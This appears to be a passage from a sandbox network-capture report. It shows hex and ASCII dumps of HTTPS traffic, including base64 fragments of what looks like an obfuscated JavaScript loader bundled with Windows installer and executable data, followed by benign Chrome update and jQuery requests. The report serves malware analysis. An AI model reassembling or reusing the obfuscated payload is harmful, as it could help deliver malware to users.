                                                                  2023-04-26 07:00:14 UTC4625INData Raw: 34 5a 6a 6b 30 4e 79 67 77 65 47 52 6c 4d 53 6c 64 20 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 78 4e 32 51 34 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 49 77 4f 47 49 70 20 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 6a 67 79 4e 43 6c 64 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 78 5a 6a 67 70 20 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 6d 52 6a 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 45 32 4d 44 6b 70 20 58 53 78 66 4d 48
                                                                  Data Ascii: 4Zjk0NygweGRlMSld LF8weDgyMGFjMltfMHg0OGY5NDcoMHgxN2Q4KV0sXzB4ODIwYWMyW18weDQ4Zjk0NygweDIwOGIp XSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4MjgyNCldLF8weDgyMGFjMltfMHg0OGY5NDcoMHgxZjgp XSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4MmRjKV0sXzB4ODIwYWMyW18weDQ4Zjk0NygweDE2MDkp XSxfMH
                                                                  2023-04-26 07:00:14 UTC4641INData Raw: 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 79 4d 54 6c 6d 20 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 4a 69 5a 44 45 70 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 6a 45 30 20 5a 43 6c 64 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 78 4e 7a 45 32 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 46 68 20 4e 6d 49 70 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4e 32 46 6a 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a
                                                                  Data Ascii: 8weDgyMGFjMltfMHg0OGY5NDcoMHgyMTlm KV0sXzB4ODIwYWMyW18weDQ4Zjk0NygweDJiZDEpXSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4MjE0 ZCldLF8weDgyMGFjMltfMHg0OGY5NDcoMHgxNzE2KV0sXzB4ODIwYWMyW18weDQ4Zjk0NygweDFh NmIpXSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4N2FjKV0sXzB4ODIwYWMyW18weDQ4Zj
                                                                  2023-04-26 07:00:14 UTC4657INData Raw: 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 57 49 33 59 53 6c 64 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 20 4d 48 67 35 4e 57 55 70 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 54 51 30 4f 53 6c 64 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 20 4d 48 67 34 4d 54 4d 70 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 6a 63 7a 5a 53 6c 64 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 20 4d 48 67 79 4e 47 49 33 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 45 33 59 54 4d 70 58
                                                                  Data Ascii: zB4NDhmOTQ3KDB4MWI3YSldLF8weDgyMGFjMltfMHg0OGY5NDco MHg5NWUpXSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4MTQ0OSldLF8weDgyMGFjMltfMHg0OGY5NDco MHg4MTMpXSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4MjczZSldLF8weDgyMGFjMltfMHg0OGY5NDco MHgyNGI3KV0sXzB4ODIwYWMyW18weDQ4Zjk0NygweDE3YTMpX
                                                                  2023-04-26 07:00:14 UTC4673INData Raw: 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 78 5a 6d 4a 6b 4b 56 30 73 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 49 79 59 57 51 70 58 53 78 66 20 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 57 59 34 4d 79 6c 64 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 79 4d 6a 51 77 4b 56 30 73 20 58 7a 42 34 4f 44 49 77 59 57 4d 79 57 31 38 77 65 44 51 34 5a 6a 6b 30 4e 79 67 77 65 44 4a 69 4d 47 4d 70 58 53 78 66 4d 48 67 34 4d 6a 42 68 59 7a 4a 62 58 7a 42 34 4e 44 68 6d 4f 54 51 33 4b 44 42 34 4d 6d 49 31 4f 43 6c 64 20 4c 46 38 77 65 44 67 79 4d 47 46 6a 4d 6c 74 66 4d 48 67 30 4f 47 59 35 4e 44 63 6f 4d 48 67 78
                                                                  Data Ascii: MltfMHg0OGY5NDcoMHgxZmJkKV0sXzB4ODIwYWMyW18weDQ4Zjk0NygweDIyYWQpXSxf MHg4MjBhYzJbXzB4NDhmOTQ3KDB4MWY4MyldLF8weDgyMGFjMltfMHg0OGY5NDcoMHgyMjQwKV0s XzB4ODIwYWMyW18weDQ4Zjk0NygweDJiMGMpXSxfMHg4MjBhYzJbXzB4NDhmOTQ3KDB4MmI1OCld LF8weDgyMGFjMltfMHg0OGY5NDcoMHgx
                                                                  2023-04-26 07:00:14 UTC4689INData Raw: 4b 69 30 77 65 44 45 7a 20 5a 47 59 70 58 53 68 66 4d 48 67 78 4d 54 67 33 4d 47 4d 6f 4d 48 68 6b 59 7a 55 72 4d 48 67 79 4d 57 51 7a 4b 79 30 77 65 44 67 71 4d 48 67 31 59 7a 6b 70 4b 31 38 77 65 44 45 78 4f 44 63 77 59 79 67 77 65 47 4a 6c 4d 53 73 77 20 65 47 49 71 4d 48 67 78 59 6a 67 72 4c 54 42 34 4d 54 45 71 4d 48 67 78 59 6d 55 70 4b 31 38 77 65 44 45 78 4f 44 63 77 59 79 67 74 4d 48 68 69 4e 7a 51 71 4c 54 42 34 4d 69 73 74 4d 48 67 78 4b 69 30 77 65 44 4a 6b 4e 79 73 77 20 65 44 67 7a 4d 79 6f 74 4d 48 67 7a 4b 53 74 66 4d 48 67 78 4d 54 67 33 4d 47 4d 6f 4c 54 42 34 4d 53 6f 74 4d 48 67 79 4e 6a 49 33 4b 79 30 77 65 44 46 6a 4f 44 55 72 4c 54 42 34 4f 44 4d 77 4b 53 74 66 4d 48 67 78 4d 54 67 33 20 4d 47 4d 6f 4d 48 67 78 4e 69 6f 77 65 47 4d
                                                                  Data Ascii: Ki0weDEz ZGYpXShfMHgxMTg3MGMoMHhkYzUrMHgyMWQzKy0weDgqMHg1YzkpK18weDExODcwYygweGJlMSsw eGIqMHgxYjgrLTB4MTEqMHgxYmUpK18weDExODcwYygtMHhiNzQqLTB4MistMHgxKi0weDJkNysw eDgzMyotMHgzKStfMHgxMTg3MGMoLTB4MSotMHgyNjI3Ky0weDFjODUrLTB4ODMwKStfMHgxMTg3 MGMoMHgxNioweGM
                                                                  2023-04-26 07:00:14 UTC4705INData Raw: 6c 49 47 4e 68 59 6d 6c 75 5a 58 51 67 5a 6d 6c 73 5a 53 42 70 63 79 42 6a 20 62 33 4a 79 64 58 42 30 4c 6e 74 37 49 43 42 46 63 6e 4a 76 63 69 42 62 4d 31 30 67 64 32 46 7a 49 48 4a 6c 64 48 56 79 62 6d 56 6b 49 47 4a 35 49 46 64 70 62 6c 5a 6c 63 6d 6c 6d 65 56 52 79 64 58 4e 30 4c 6e 31 39 51 32 39 31 20 62 47 51 67 62 6d 39 30 49 47 39 77 5a 57 34 67 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 49 46 73 79 58 53 42 7a 64 47 39 79 5a 57 51 67 59 58 4d 67 59 32 68 70 62 47 51 67 63 33 52 76 63 6d 46 6e 5a 53 42 76 5a 69 42 77 59 57 4e 72 20 59 57 64 6c 49 46 73 30 58 53 35 47 59 57 6c 73 5a 57 51 67 64 47 38 67 59 32 39 79 63 6d 56 6a 64 47 78 35 49 48 42 68 64 47 4e 6f 49 46 73 79 58 53 42 6d 61 57 78 6c 4f 69 42 44 55 6b 4d 67 5a 58 4a 79 62 33 49 75 56 47 68
                                                                  Data Ascii: lIGNhYmluZXQgZmlsZSBpcyBj b3JydXB0Lnt7ICBFcnJvciBbM10gd2FzIHJldHVybmVkIGJ5IFdpblZlcmlmeVRydXN0Ln19Q291 bGQgbm90IG9wZW4gdHJhbnNmb3JtIFsyXSBzdG9yZWQgYXMgY2hpbGQgc3RvcmFnZSBvZiBwYWNr YWdlIFs0XS5GYWlsZWQgdG8gY29ycmVjdGx5IHBhdGNoIFsyXSBmaWxlOiBDUkMgZXJyb3IuVGh
                                                                  2023-04-26 07:00:14 UTC4721INData Raw: 55 67 63 32 56 6a 64 58 4a 70 64 48 6b 67 5a 6d 39 79 49 47 5a 70 62 47 55 67 4a 31 73 7a 58 53 63 75 49 45 56 79 63 6d 39 79 20 4f 69 42 62 4d 6c 30 75 49 43 42 57 5a 58 4a 70 5a 6e 6b 67 64 47 68 68 64 43 42 35 62 33 55 67 61 47 46 32 5a 53 42 7a 64 57 5a 6d 61 57 4e 70 5a 57 35 30 49 48 42 79 61 58 5a 70 62 47 56 6e 5a 58 4d 67 64 47 38 67 62 57 39 6b 20 61 57 5a 35 49 48 52 6f 5a 53 42 7a 5a 57 4e 31 63 6d 6c 30 65 53 42 77 5a 58 4a 74 61 58 4e 7a 61 57 39 75 63 79 42 6d 62 33 49 67 64 47 68 70 63 79 42 6d 61 57 78 6c 4c 6b 39 45 51 6b 4d 67 51 32 39 75 62 6d 56 6a 64 44 6f 67 20 64 47 6c 74 5a 57 39 31 64 43 42 6c 65 47 4e 6c 5a 57 52 6c 5a 43 35 54 64 48 4a 6c 59 57 30 67 5a 47 39 6c 63 79 42 75 62 33 51 67 5a 58 68 70 63 33 51 36 49 46 73 79 58 53
                                                                  Data Ascii: Ugc2VjdXJpdHkgZm9yIGZpbGUgJ1szXScuIEVycm9y OiBbMl0uICBWZXJpZnkgdGhhdCB5b3UgaGF2ZSBzdWZmaWNpZW50IHByaXZpbGVnZXMgdG8gbW9k aWZ5IHRoZSBzZWN1cml0eSBwZXJtaXNzaW9ucyBmb3IgdGhpcyBmaWxlLk9EQkMgQ29ubmVjdDog dGltZW91dCBleGNlZWRlZC5TdHJlYW0gZG9lcyBub3QgZXhpc3Q6IFsyXS
                                                                  2023-04-26 07:00:14 UTC4737INData Raw: 47 68 6c 49 47 5a 70 62 47 55 67 64 47 46 69 62 47 55 75 52 6d 6c 73 5a 53 42 62 4d 6c 30 67 61 58 4d 67 62 6d 39 30 49 47 45 67 64 6d 46 73 61 57 51 67 63 47 46 30 59 32 67 67 20 5a 6d 6c 73 5a 53 35 47 61 57 78 6c 49 46 73 79 58 53 42 70 63 79 42 75 62 33 51 67 59 53 42 32 59 57 78 70 5a 43 42 6b 5a 58 4e 30 61 57 35 68 64 47 6c 76 62 69 42 6d 61 57 78 6c 49 47 5a 76 63 69 42 77 59 58 52 6a 61 43 42 6d 20 61 57 78 6c 49 46 73 7a 58 53 35 46 63 6e 4a 76 63 69 42 76 63 47 56 75 61 57 35 6e 49 47 5a 70 62 47 55 67 5a 6d 39 79 49 48 4a 6c 59 57 51 36 49 46 73 7a 58 53 42 48 5a 58 52 4d 59 58 4e 30 52 58 4a 79 62 33 49 36 49 46 73 79 20 58 53 35 46 63 6e 4a 76 63 69 42 76 63 47 56 75 61 57 35 6e 49 47 5a 70 62 47 55 67 5a 6d 39 79 49 48 64 79 61 58 52 6c 4f
                                                                  Data Ascii: GhlIGZpbGUgdGFibGUuRmlsZSBbMl0gaXMgbm90IGEgdmFsaWQgcGF0Y2gg ZmlsZS5GaWxlIFsyXSBpcyBub3QgYSB2YWxpZCBkZXN0aW5hdGlvbiBmaWxlIGZvciBwYXRjaCBm aWxlIFszXS5FcnJvciBvcGVuaW5nIGZpbGUgZm9yIHJlYWQ6IFszXSBHZXRMYXN0RXJyb3I6IFsy XS5FcnJvciBvcGVuaW5nIGZpbGUgZm9yIHdyaXRlO
                                                                  2023-04-26 07:00:14 UTC4753INData Raw: 62 32 34 67 63 48 4a 76 59 32 56 7a 63 79 35 55 61 47 56 79 5a 53 42 33 59 58 4d 67 59 57 34 67 5a 58 4a 79 62 33 49 67 5a 48 56 79 61 57 35 6e 49 48 52 6f 5a 53 42 54 55 55 77 67 63 32 4e 79 61 58 42 30 49 47 56 34 5a 57 4e 31 20 64 47 6c 76 62 69 42 77 63 6d 39 6a 5a 58 4e 7a 4c 6b 39 45 51 6b 4d 67 52 58 4a 79 62 33 49 36 49 46 73 79 58 53 41 6f 57 7a 4e 64 4b 53 35 54 55 55 77 67 63 32 4e 79 61 58 42 30 49 48 42 68 63 6e 4e 6c 49 47 56 79 63 6d 39 79 20 4f 69 42 70 62 6e 5a 68 62 47 6c 6b 49 48 4e 35 62 6e 52 68 65 43 35 4a 62 6e 52 6c 63 6d 35 68 62 43 42 6c 63 6e 4a 76 63 69 42 70 62 69 42 44 59 57 78 73 55 33 52 6b 52 6d 4e 75 4c 6c 64 76 64 57 78 6b 49 48 6c 76 64 53 42 73 20 61 57 74 6c 49 48 52 76 49 48 4a 6c 62 57 39 32 5a 53 42 62 55 48 4a 76
                                                                  Data Ascii: b24gcHJvY2Vzcy5UaGVyZSB3YXMgYW4gZXJyb3IgZHVyaW5nIHRoZSBTUUwgc2NyaXB0IGV4ZWN1 dGlvbiBwcm9jZXNzLk9EQkMgRXJyb3I6IFsyXSAoWzNdKS5TUUwgc2NyaXB0IHBhcnNlIGVycm9y OiBpbnZhbGlkIHN5bnRheC5JbnRlcm5hbCBlcnJvciBpbiBDYWxsU3RkRmNuLldvdWxkIHlvdSBs aWtlIHRvIHJlbW92ZSBbUHJv
                                                                  2023-04-26 07:00:14 UTC4769INData Raw: 41 67 41 47 41 41 45 41 44 41 41 42 41 41 6b 41 20 41 51 41 4b 41 41 45 41 43 51 41 42 41 41 67 41 41 51 41 56 41 41 45 41 4c 67 41 42 41 41 6b 41 41 51 41 45 41 44 51 41 44 77 41 42 41 41 63 41 41 51 41 50 41 41 45 41 42 77 41 42 41 41 77 41 41 51 41 48 41 42 59 41 44 77 41 42 20 41 42 45 41 41 51 41 49 41 41 49 41 44 77 41 42 41 41 67 41 41 67 41 4e 41 41 45 41 43 41 41 43 41 41 77 41 41 51 41 50 41 41 45 41 44 77 41 42 41 41 67 41 41 67 41 49 41 41 45 41 42 41 41 43 41 41 30 41 41 51 41 49 41 41 49 41 20 43 67 41 42 41 41 67 41 41 67 41 4b 41 41 45 41 43 41 41 43 41 41 6b 41 41 51 41 43 41 41 67 41 43 67 41 42 41 41 4d 41 41 67 41 57 41 41 45 41 44 67 41 42 41 41 77 41 48 77 41 47 41 41 49 41 44 51 41 42 41 41 51 41 41 51 41 4e 20 41 41 45 41 43 51 41
                                                                  Data Ascii: AgAGAAEADAABAAkA AQAKAAEACQABAAgAAQAVAAEALgABAAkAAQAEADQADwABAAcAAQAPAAEABwABAAwAAQAHABYADwAB ABEAAQAIAAIADwABAAgAAgANAAEACAACAAwAAQAPAAEADwABAAgAAgAIAAEABAACAA0AAQAIAAIA CgABAAgAAgAKAAEACAACAAkAAQACAAgACgABAAMAAgAWAAEADgABAAwAHwAGAAIADQABAAQAAQAN AAEACQA
                                                                  2023-04-26 07:00:14 UTC4785INData Raw: 55 54 41 41 51 41 41 43 67 44 41 41 41 4c 6e 52 6c 65 48 51 6b 62 57 34 41 41 41 41 41 41 43 41 41 20 41 47 67 41 41 41 41 75 61 57 52 68 64 47 45 6b 4e 51 41 41 41 41 42 6f 49 41 41 41 4f 41 45 41 41 43 35 79 5a 47 46 30 59 51 41 41 6f 43 45 41 41 4a 51 41 41 41 41 75 5a 57 52 68 64 47 45 41 41 44 51 69 41 41 42 51 41 51 41 41 20 4c 6e 4a 6b 59 58 52 68 4a 48 70 36 65 6d 52 69 5a 77 41 41 41 49 51 6a 41 41 41 38 41 41 41 41 4c 6d 6c 6b 59 58 52 68 4a 44 49 41 41 41 41 41 77 43 4d 41 41 42 51 41 41 41 41 75 61 57 52 68 64 47 45 6b 4d 77 41 41 41 41 44 55 20 49 77 41 41 5a 41 41 41 41 43 35 70 5a 47 46 30 59 53 51 30 41 41 41 41 41 44 67 6b 41 41 44 73 41 41 41 41 4c 6d 6c 6b 59 58 52 68 4a 44 59 41 41 41 41 41 41 44 41 41 41 41 77 41 41 41 41 75 59 6e 4e
                                                                  Data Ascii: UTAAQAACgDAAALnRleHQkbW4AAAAAACAA AGgAAAAuaWRhdGEkNQAAAABoIAAAOAEAAC5yZGF0YQAAoCEAAJQAAAAuZWRhdGEAADQiAABQAQAA LnJkYXRhJHp6emRiZwAAAIQjAAA8AAAALmlkYXRhJDIAAAAAwCMAABQAAAAuaWRhdGEkMwAAAADU IwAAZAAAAC5pZGF0YSQ0AAAAADgkAADsAAAALmlkYXRhJDYAAAAAADAAAAwAAAAuYnN


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.349701142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:20 UTC4799OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                  Host: clients2.google.com
                                                                  Connection: keep-alive
                                                                  X-Goog-Update-Interactivity: fg
                                                                  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                  X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: empty
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:20 UTC4826INHTTP/1.1 200 OK
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Q4iJ0nGzEDL7EUey3qjmEg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 26 Apr 2023 07:00:20 GMT
                                                                  Content-Type: text/xml; charset=UTF-8
                                                                  X-Daynum: 5959
                                                                  X-Daystart: 20
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Server: GSE
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  2023-04-26 07:00:20 UTC4826INData Raw: 32 63 36 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 35 39 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 20 73 74
                                                                  Data Ascii: 2c6<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5959" elapsed_seconds="20"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname="" st
                                                                  2023-04-26 07:00:20 UTC4827INData Raw: 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                  Data Ascii: b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                  2023-04-26 07:00:20 UTC4827INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.349705104.17.25.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:20 UTC4800OUTGET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:20 UTC4802INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:00:20 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"603e8adc-15d9d"
                                                                  Last-Modified: Tue, 02 Mar 2021 18:58:36 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 3476513
                                                                  Expires: Mon, 15 Apr 2024 07:00:20 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GY8HXwVvGpbcN0ukFvnZGtiKbgNMvgMPDW%2FjkeqrxFzj54TtXp3ruR9kaB9ZVAWh%2BnoXaNe5qw0PFzcNTSKYRE54PO%2BShkKW5Vrg199mTDnbSDVPK31XloXbUNeaZfJxJO9KsxbL"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 7bdcf2bd9ec39a0b-FRA
                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  2023-04-26 07:00:20 UTC4803INData Raw: 33 39 63 39 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                  Data Ascii: 39c9/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                  2023-04-26 07:00:20 UTC4804INData Raw: 3b 76 61 72 20 74 3d 5b 5d 2c 72 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                  Data Ascii: ;var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==t
